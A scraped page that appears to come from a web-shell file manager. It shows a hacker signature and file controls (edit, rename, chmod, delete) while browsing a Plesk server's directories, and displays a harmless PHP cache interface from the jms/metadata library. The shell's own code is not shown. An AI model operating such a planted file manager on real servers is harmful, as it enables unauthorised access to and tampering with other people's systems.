Submit
Path:
~
/
/
proc
/
self
/
root
/
opt
/
psa
/
admin
/
plib
/
modules
/
rest-api
/
vendor
/
jms
/
metadata
/
src
/
Cache
/
File Content:
CacheInterface.php
<?php declare (strict_types=1); namespace PleskRestApi\Metadata\Cache; use PleskRestApi\Metadata\ClassMetadata; interface CacheInterface { /** * Loads a class metadata instance from the cache */ public function load(string $class) : ?ClassMetadata; /** * Puts a class metadata instance into the cache */ public function put(ClassMetadata $metadata) : void; /** * Evicts the class metadata for the given class from the cache. */ public function evict(string $class) : void; }
Edit
Rename
Chmod
Delete
FILE
FOLDER
INFO
Name
Size
Permission
Action
CacheInterface.php
531 bytes
0644
ClearableCacheInterface.php
272 bytes
0644
DoctrineCacheAdapter.php
1241 bytes
0644
FileCache.php
4068 bytes
0644
PsrCacheAdapter.php
1760 bytes
0644
N4ST4R_ID | Naxtarrr